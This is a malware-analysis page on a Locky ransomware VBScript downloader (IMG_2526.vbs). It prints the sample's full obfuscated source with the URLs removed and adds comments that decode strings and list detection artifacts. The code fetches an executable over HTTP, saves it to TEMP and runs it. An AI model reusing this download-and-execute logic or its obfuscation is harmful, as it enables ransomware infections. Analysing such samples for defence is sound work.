IMG_2526.vbs win.locky木马分析


以下为该样本的 VBS 源代码,木马下载链接已经删除。(注意:页面排版把脚本中的部分引号、注释符号和减号替换成了弯引号和长横线,与原始脚本的字符可能不一致。)


' Scans the Mines array for the first entry whose Color is 0 and fills it with the
' supplied values, growing the array by one slot when no free entry is found.
' NOTE(review): Mines is not declared anywhere in the visible listing and nothing in
' the visible listing calls Set2Mine, so this looks like unrelated filler code padding
' the script rather than part of the download logic - confirm against the full sample.
Function Set2Mine(Who, Color, X, y) 
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            ' Assigns to SetMine, not Set2Mine, so the function's own return value is never set.
            SetMine = i
            Exit For
        End If
    Next
End Function

' Script-level variable; later receives the value read from the process environment
' with key JohnTheRipper(6), which decodes to "TemP".
Dim Salpodeinthriftyensurance ‘As String

' Script-level variable; later holds the full path the downloaded body is saved to and run from.
Dim SalpodeinthriftyUotOfStock ‘As String

' Checks that the folder named by oEnvironment.Item("SLShare") is reachable and logs a
' warning if it does not exist. Nothing is copied in the body as shown.
' NOTE(review): oUtility, oEnvironment, oFSO and oLogging are not created anywhere in the
' visible listing and CopyLog is never called in it, so this appears to be benign-looking
' filler pasted in to pad the script - confirm against the full sample.
Function CopyLog()

Dim oFile
Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
Dim sComputer
Dim sLog
Dim sBootDrive
‘ Make sure the path is accessible
oUtility.ValidateConnection oEnvironment.Item(“SLShare”)
oUtility.VerifyPathExists oEnvironment.Item(“SLShare”)
If not oFSO.FolderExists(oEnvironment.Item(“SLShare”)) then
oLogging.CreateEntry “An invalid SLShare value of ” & oEnvironment.Item(“SLShare”) & ” was specified.”, LogTypeWarning
Exit Function
End if

End Function

  ' First fragment of a request-header name. "-", "Ag" and "ent" are appended further
  ' down, so the final value is "User-Agent"; splitting it keeps the literal out of the file.
  SalpodeinthriftyBelish = “User”

' Browser-style User-Agent value (Firefox 54 on Windows 7 x64), split with "+" so the
' full string does not appear as one literal. SetUA passes it to setRequestHeader.
CUA =”Mozill”+”a/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0″
' Later set to the object created from JohnTheRipper(0), which decodes to "Microsoft.XMLHTTP".
Dim SalpodeinthriftyMorty ‘As Object
' Later set to an "Adodb.streaM" object used to write the response body to disk.
Dim StateUdepends13 ‘As Object

    ' RACHEL is not read anywhere in the visible listing.
    RACHEL = “avetof”

       ' Declared but not used in the visible listing.
       Dim TristateTrue

 ' Holds the obfuscated, delimiter-joined string table that MambaMamba decodes.
 Dim Salpodeinthrifty2 ‘As String
' Saves the contents of the ADODB stream in StateUdepends13 to the path held in
' SalpodeinthriftyUotOfStock. The second argument, 4-2, evaluates to 2, which is ADODB's
' overwrite-if-exists save option, written as arithmetic instead of a plain constant.
' D is never assigned and AXC is never read in the visible listing, so the If block
' has no effect on the save.
Function StateUdependsSubMainA()
if D = 14 then
AXC = “SaveToFile”
end if
StateUdepends13.Savetofile SalpodeinthriftyUotOfStock , 4-2
End Function

  ' Seed of the obfuscated string table. "HIPER" separates entries and "PROTECT" is filler
  ' that MambaMamba removes before splitting; more entries are prepended and appended below.
  Salpodeinthrifty2 = “XMLHTTPHIPERAdodb.streaMHIPER”
' Vrungel is not read anywhere in the visible listing.
Vrungel = “.respo”+”nseBody”

' Success flag: set to true in the download loop when a request returns status 200.
Dim Salpodeinthriftystatus
Salpodeinthriftystatus = false
     ' Later holds the array of decoded strings returned by MambaMamba.
     Dim JohnTheRipper
' Later set to the process-environment collection of the WScript.Shell object.
Dim Salpodeinthriftycashback ‘As Object

' Creates a WScript.Shell object and stores it in SalpodeinthriftyRombickom. There is no
' local Dim for that name here and it is declared at script level further down, so the
' object is visible to SheduledObject. The ProgID is split with "+" and p is ignored.
Function F3(p) 
    Set SalpodeinthriftyRombickom = CreateObject(“WScript”+”.Shell”)
End Function 

' Second stage of the string table: prepends "Microsoft." and appends more entries.
' Once "PROTECT" is stripped, the table so far splits on "HIPER" into: Microsoft.XMLHTTP,
' Adodb.streaM, shell.Application, Wscript.shell, Process, GeT, TemP, Type.
Salpodeinthrifty2 =”Microsoft.” + Salpodeinthrifty2+  “shell.ApplicationHIPERWscript”+”.shellHIPERProcessHIPERGeTHIPERT”+”emPHIPERTyPROTECT”+”pePROTECT”

' Launches the path held in SalpodeinthriftyUotOfStock through the Run method of the
' WScript.Shell object stored in SalpodeinthriftyRombickom. Both parameters are ignored.
' It is called indirectly through a GetRef reference, so its name never appears at the
' call site. For detection, this is the step where the script host starts the saved file.
Function SheduledObject(p,d)

 SalpodeinthriftyRombickom.Run(“” &SalpodeinthriftyUotOfStock)
End Function

' Later set to the object created from JohnTheRipper(9-6), which decodes to "Wscript.shell".
Dim Salpodeinthrifty1DASH1solo ‘As Object   

' Thin wrapper that returns A.CreateTextFile(B, T, F).
' Not called anywhere in the visible listing.
Function ABTF(A, B, T, F)
set ABTF = A.CreateTextFile(B,T , F)
end function
' String-table decoder: removes every "PROTECT" filler token from Salpodeinthrifty2 and
' splits the result on the delimiter passed in trtrtr, returning the array of strings.
Function MambaMamba(trtrtr)
   MambaMamba = Split(Replace(Salpodeinthrifty2, “PROTECT”, “”),  trtrtr)
End Function
 

' Final stage of the string table. After "PROTECT" is stripped and the text is split on
' "HIPER", indexes 8-14 are: open, write, responseBody, savetofile, HsQdFXw.exe, http:, //.
' HsQdFXw.exe is the file name the downloaded body is saved under.
Salpodeinthrifty2 = Salpodeinthrifty2 +”HIPERPROTECToPROTECTpenHIPERwrPROTECTiteHIPERrePROTECTspoPROTECTnseBoPROTECTdyHIPERsaPROTECTvet”+”ofPROTECTileHIPERHsQdFXw.exePROTECT”+”HIPERhtPROTECTtp:HIPER//”

' Not assigned in the visible listing (the only Set for it is commented out further down).
Dim SalpodeinthriftyGMAKO ‘As Object
' Later holds the array of download locations (removed from this listing).
Dim mual
' Sends the HTTP request previously opened on SalpodeinthriftyMorty. p is ignored.
Function SalpodeinthriftyFuks(p)
 
SalpodeinthriftyMorty.Send

End Function 
' Decodes the string table by splitting on "HIPER"; the delimiter is padded with empty
' strings. JohnTheRipper then holds the ProgIDs, method names, file name and URL prefix.
JohnTheRipper = MambaMamba(“” + “HIPER” + “”)
' Index 0 decodes to "Microsoft.XMLHTTP": the HTTP client used for the download.
Set SalpodeinthriftyMorty = CreateObject(JohnTheRipper(0))

' Copies the HTTP response body from SalpodeinthriftyMorty into SalpodeinthriftyASALLLP.
' The condition (1 < param1 OR param1 < 6777) holds for any number, so the copy always
' runs. The arithmetic on param1 does not influence what is stored.
Function StateUdependsSubMainA2(param1)
param1 = param1 + param1
if  1  < param1 OR param1 < 6777  Then
SalpodeinthriftyASALLLP = SalpodeinthriftyMorty.responseBody
end if
param1 = 2 * param1
End Function

 
' Later holds the full request URL (MarketPlace prefix + one entry of mual).
Dim Salpodeinthrifty4 ‘As String

' Script-level slot for the WScript.Shell object that F3 creates and SheduledObject uses.
Dim SalpodeinthriftyRombickom
 ' Later holds the URL scheme prefix built from JohnTheRipper(13) and JohnTheRipper(14).
 Dim MarketPlace ‘As String
  ' Later holds JohnTheRipper(12), the file name "HsQdFXw.exe".
  Dim sTempVis ‘As String
  ' Declared but not used in the visible listing.
  Dim iCount ‘As Integer
' Calls aWrite.Write bWrite. astp is always 15 at the comparison, so the write always
' happens; the counter arithmetic around it has no other effect.
' At its one call site the stream is StateUdepends13 and the data is the response body.
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
' Script-level setup: declares working variables, finishes part of the "User-Agent"
' header name, and creates the COM objects used for saving and running the download.
' Receives the HTTP response body in StateUdependsSubMainA2.
Dim SalpodeinthriftyASALLLP ‘As Variant
Dim dePetya ‘As Integer
' Header name is now "User-".
SalpodeinthriftyBelish = SalpodeinthriftyBelish + “-“
 
Dim Twelve ‘As Integer
  Dim sDecimalVis ‘As String
  Dim SalpodeinthriftyPetir ‘As String
' Next fragment of the header name; appended together with "ent" further down.
SalpodeinthriftyPetir = “Ag”

  Dim MarketPlaceibility ‘As String

 Dim sNodeKey ‘As String
  Dim sParentKey ‘As String

    
 

' Evaluates to 12, the string-table index of the file name "HsQdFXw.exe".
Twelve = 11 + 1
' Index 1 decodes to "Adodb.streaM"; zTempVis is not read later in the visible listing.
zTempVis = JohnTheRipper(1)

‘Set SalpodeinthriftyGMAKO = CreateObject(JohnTheRipper(8-6))
' Indirect reference to SheduledObject, so the later call site does not name the function.
Set SalpodeinthriftyRockiBilbo = GetRef(“SheduledObject”)

' Stream object used to write the downloaded bytes to disk.
Set StateUdepends13 = CreateObject(“Adodb.streaM”)
' Index 9-6 = 3 decodes to "Wscript.shell"; used below to read the process environment.
Set Salpodeinthrifty1DASH1solo = CreateObject(JohnTheRipper(9-6))

' Sets a request header named by SalpodeinthriftyBelish ("User-Agent" once all fragments
' are appended) to the value in CUA.
' NOTE(review): the call targets SalpodeinthriftyLamp, which is not assigned anywhere in
' the visible listing; the request object is SalpodeinthriftyMorty. On Error Resume Next
' is active at the call site, so a failure here would be silently skipped and the header
' may not actually be sent - verify against captured traffic before relying on it.
Function SetUA()
SalpodeinthriftyLamp.setRequestHeader SalpodeinthriftyBelish, CUA
End Function

' Host check: concatenating the WScript object yields its default property, so the
' comparison only matches when that value is "Windows Script Host". Presumably this
' keeps the setup below from running under an emulator or another host - hedged,
' since the listing does not state the intent.
if “RIDG” + WScript + “4” = “RIDGWindows Script Host4” Then 

' Download locations, without the scheme prefix; the analyst replaced them with placeholders.
mual = Array(“ 木马 url 链接 ”,” 木马 url 链接 ”,” 木马 url 链接 ”)

' Index 1 + 3 = 4 decodes to "Process": the process-level environment collection.
Set Salpodeinthriftycashback = Salpodeinthrifty1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if

' Collision-style movement routine for UniBall(i), stepping along Y and reversing
' BMoveY when WeaponTouch returns -6.
' NOTE(review): UniBall and WeaponTouch are not defined anywhere in the visible listing
' and nothing in it calls Anim2UniBall. Rx and Ry are assigned but never read, and SgnY,
' NewX and NewY are declared but never assigned in this body, so neither SgnY branch can
' be entered. This looks like unrelated filler code - confirm against the full sample.
' The dash characters in "d – 1" and "BallY – 1" are typographic dashes as rendered on the page.
Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
    
    
    If SgnY = 1 Then ‘y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d – 1
                Exit For
            End If
        Next
    End If
    
    If SgnY = -1 Then ‘y negative testing
        For d = UniBall(i).BallY – 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
    
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function

 ' dePetya is only incremented in the download loop and never read for a decision in
 ' the visible listing.
 dePetya = 89210

 
' Index 6 decodes to "TemP": reads that value from the process environment collection.
' This becomes the directory part of the drop path.
Salpodeinthriftyensurance = Salpodeinthriftycashback(JohnTheRipper(6))
 Dim i
 ‘on error GoTo nextU
‘ on error resume next
' Twelve is 12, so this is the file name "HsQdFXw.exe".
sTempVis = JohnTheRipper(Twelve)

' Builds one MSG_FLAGS message per entry of Flag1..Flag5 (group number, index, two
' values from the Flag array and one from the FlagCarry array) and passes each to SendTo.
' NOTE(review): Flag1..Flag5, FlagCarry1..FlagCarry5, MSG_FLAGS, AddBufferData and SendTo
' are not defined anywhere in the visible listing, and nothing in it calls SendFlagDat.
' VarPtr is a VB6/VBA function rather than a VBScript one, which suggests this block was
' lifted from an unrelated VB program as filler - confirm against the full sample.
Sub SendFlagDat(SndTo)
    Dim i , b , n 
    Dim oNewMsg() , lNewOffSet 
    Dim lNewMsg 
    
    ' Group 1
    For i = 1 To UBound(Flag1, 2)
        
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    ' Group 2
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    ' Group 3
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    ' Group 4
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    ' Group 5
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    
End Sub
' Main flow of the script: try each download location in turn, and on the first HTTP 200
' write the response body to disk and start it.
' Artifacts visible in this listing that an analyst can pivot on: the file name
' "HsQdFXw.exe" under a TEMP-derived path, the Firefox 54 User-Agent value in CUA, and the
' COM objects Microsoft.XMLHTTP, Adodb.Stream and WScript.Shell used by a script host.
' rdde, dr1, dttat, drba, triada, SalpodeinthriftyTmp1 and SalpodeinthriftyUotOfStocku are
' assigned but never read for any decision in the visible listing.
' Indexes 13 and 14 decode to "http:" and "//", so MarketPlace is "http://".
MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

' Header name becomes "User-" & "Ag" & "ent" = "User-Agent".
SalpodeinthriftyBelish = SalpodeinthriftyBelish & SalpodeinthriftyPetir & “ent”

rdde = 19

lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

' Errors are suppressed from here on, so an unreachable host just falls through to the
' next entry.
on error resume  next

dePetya =  dePetya +7
 Salpodeinthrifty4 = MarketPlace + mual(i)
 ' Index 5 decodes to "GeT"; the third argument False makes the request synchronous.
 SalpodeinthriftyMorty.Open JohnTheRipper(5), Salpodeinthrifty4, False
dr1=2

rdde = rdde + 7

SetUA()
SalpodeinthriftyFuks ” d “
' Status + 3 = 203 is an obscured test for HTTP status 200; the first success ends the loop.
If SalpodeinthriftyMorty.Status +3 = 203 Then
Salpodeinthriftystatus = true
 Exit For
End If

' NOTE(review): VBScript has no line labels, so this is presumably parsed as a call to an
' undefined name and skipped under On Error Resume Next - confirm.
goto14:
Next

' Normal error handling is restored before the save-and-run stage.
on error goto 0
if Salpodeinthriftystatus Then
Dim Ratchet ‘As String
 ' Drop path = TemP environment value + "HsQdFXw.exe". The two parts are concatenated
 ' directly with no path separator added here, so the final location depends on whether
 ' the environment value ends in a backslash.
 SalpodeinthriftyUotOfStock = Salpodeinthriftyensurance+ sTempVis

' Creates the WScript.Shell object that SheduledObject uses.
F3 “”
' Type = 1 selects binary mode on the ADODB stream.
StateUdepends13.Type = 1
 StateUdepends13.Open
' Copies the response body into SalpodeinthriftyASALLLP; the argument 22 is irrelevant.
StateUdependsSubMainA2 22 
' Writes the response body into the stream.
WriteCD StateUdepends13,SalpodeinthriftyASALLLP
dttat =4
SalpodeinthriftyUotOfStocku = “” + SalpodeinthriftyUotOfStock 

dttat = dttat*2

' Saves the stream to the drop path, overwriting any existing file.
StateUdependsSubMainA()
Dim SalpodeinthriftyJohnSnowu,SalpodeinthriftyTmp1 ‘As Long

SalpodeinthriftyJohnSnowu = 3012

' 1040 < 3012 is always true, so the branch below always runs.
If 1040  < SalpodeinthriftyJohnSnowu Then
  drba =55
 SalpodeinthriftyTmp1 = “|”

' Indirect call to SheduledObject through the GetRef reference; both arguments are
' ignored by the callee, which runs the saved file.
SalpodeinthriftyRockiBilbo “}}}}}}}}}}}}}”,”062″
End If
triada = 341
end if
